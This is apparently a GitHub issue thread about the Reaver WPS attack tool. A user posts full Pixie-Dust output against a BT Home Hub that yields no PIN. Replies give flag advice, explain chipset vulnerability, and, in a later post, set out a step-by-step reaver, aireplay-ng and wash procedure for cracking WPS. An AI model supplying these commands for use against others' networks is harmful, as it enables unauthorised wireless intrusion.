t6x/reaver-wps-fork-t6x #34: Reaver getting all info but no pin

thesolyom, 2015-08-19:
My apologies if this is not the place for this question, I have spent hours trying to find information. 
The problem, I ran Reaver on a BT Hub using reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -c 11 -vv -S -d 0 -a -t 15 -N -K 1
Reaver returned all the information I thought it would require to crack the pin but it doesn't.
Having researched I know that not all routers can be hacked so my question is if a router can't be hacked would Reaver still get all the info and then pixiewps cannot get the pin from the info?
Is there anything else I could try with this information?
Data as follows
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Switching wlan0mon to channel 11
[+] Waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: BTHub3-5568)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: d9:c0:0f:9f:35:b8:cf:14:9b:fa:d8:94:cc:eb:ad:cf
[P] PKE: 4c:28:07:94:ff:f3:2c:50:f9:df:61:cc:f1:35:fb:24:a3:b9:8d:93:03:0b:18:92:19:58:8f:c3:cf:8f:6b:f1:18:22:ee:eb:36:69:b9:5e:ea:48:ed:18:51:06:f9:97:6c:18:e2:0d:3a:4f:22:2f:b0:41:a0:1a:c2:83:7e:76:fe:90:11:df:db:06:5b:5a:09:cb:c4:3e:2b:40:ce:fd:6c:7e:79:09:c1:e3:bf:ca:ca:58:27:17:5d:a4:34:72:5a:70:69:84:26:f8:68:bd:ec:69:d1:09:f1:fc:8c:64:53:e6:7e:db:ff:f1:43:8b:17:27:84:62:09:f6:92:c0:77:54:ed:5a:a5:bd:43:ef:52:f4:c3:ed:a1:53:f6:59:00:f2:71:4e:58:b2:95:4b:09:d9:61:e8:8b:0c:63:c7:ec:f7:9c:6a:5f:be:d9:c8:8c:5a:97:63:40:41:83:11:e9:3c:45:fe:73:f6:5a:b7:00:7c:ad:da:e7:b0:12:8d
[P] WPS Manufacturer: BTeros
[P] WPS Model Name: Home Hub 3.0 Multi Mode
[P] WPS Model Number: BT Home Hub 3.0A
[P] Access Point Serial Number: 1049025965
[+] Received M1 message
[P] R-Nonce: 2a:c4:42:9c:12:74:58:a1:02:87:82:89:78:c1:58:f9
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
[P] AuthKey: 77:e9:18:37:cb:28:36:55:88:27:c1:c9:28:30:4a:fa:07:d1:bc:e2:75:98:0a:f6:d8:89:22:c2:8a:4e:0b:64
[+] Sending M2 message
[P] E-Hash1: 30:2d:1d:55:40:5a:fe:ac:50:8a:59:c4:29:92:20:09:40:6a:8d:f8:00:7e:bb:bd:cb:f7:ae:17:38:e1:24:98
[P] E-Hash2: 6a:9f:0a:71:61:9f:23:77:6b:96:09:fb:67:dd:52:28:e5:ad:59:de:a0:df:9e:bc:82:f8:74:15:76:28:c2:8b
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.1
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!

Lastly is it prudent to always xx the mac address when posting on forums?

d8tahead, 2015-08-20:
It seems to be an older version. The new versions require -vvv instead of -vv. try and update to the latest version of reaver and also, in case, pixiewps.

You can also try without -S, and you might get a different pixiewps result. I can't verify if you will or not, as I have not looked up the router model for its chipset.

thesolyom, 2015-08-20:
Both were updated to the latest version and I used t6x version of reaver. and also kali 2. Am I correct in thinking that pixiewps might not get the pin even with all that data if it is the wrong chipset?  Would you give me the link to where I can check chipsets please?

kcdtv, 2015-08-21:
maybe _ as suggested by data _ try without small "D.H." key ( no -S )
are you in hurry? because -d 0 is really fast and no delay :dancers: 
<quote> 
Am I correct in thinking that pixiewps might not get the pin even with all that data if it is the wrong chipset? 
</quote>
absolutely. Every kind of chipset has it own breach and if no breach is known for you chipset then there is no miracle....
<quote>
Would you give me the link to where I can check chipsets please?
 </quote>
Weird question.... or i don't get it. 
Go to your manufacturer page to check that or you can check it out on a page like <url>www.wikidevi.com</url>
have a loock on your manual, they often have a data sheet where you should get this info.
cheers

thesolyom, 2015-08-24:
Thanks for the reply
In the last question I meant is there a daatabase of chipsets that are susceptible to this kind of attack.. Thanks for the link, I'll have a read through that just in case.

soxrok2212, 2015-11-05:
Be sure to run reaver with -vvv and I recommend not using -S as it causes issues with realtek based routers.

closed 2015-11-05 by soxrok2212

Despized, 2016-09-05:
had same issue to solve just leave the checksum (8th) digit off (only put in the first 7 digits) of the pin and run again in bully.  I didnt check to see if this will work with reaver but it just might.   Good luck

Despized

kcdtv, 2016-09-05:
the PIN was given by reaver, it is 12345670 which starts any session if we don't se -p option
 And it is working all time (by working i mean that you now if it is right or wrong) 
in this case (old) what is weird is the PKR (00:00:00 etc. 00:02)
But the data are given and not all routers are vulnerable to pixiedust

JaviStealsLions, 2017-07-01:
This is how I ended up cracking my WiFi: Used command `reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX(BSSID) -c # -vvv`

If prompted with error associating use `aireplay-ng --fakeauth 1 -a XX:XX:XX:XX:XX:XX(BSSID) -h XX:XX:XX:XX:XX:XX(MAC of interface) wlan0mon` in a different Terminal.

Use `wash -i wlan0mon` in another Terminal to determine signal strength. That was my main problem. I was operating at -79ish, and when I grabbed a USB male to female and extended its reach from my PC I now have a signal of -62

The crack took 2 hours and 30 minutes long to complete.

I did get a bunch of `WPS transaction failed (code: 0x03), re-trying last pin`'s throughout so don't worry like I was

Hope this helps someone! :)

warbd, 2017-08-06:
the solution is here:
https://www.youtube.com/watch?v=leqBKAEqI1Q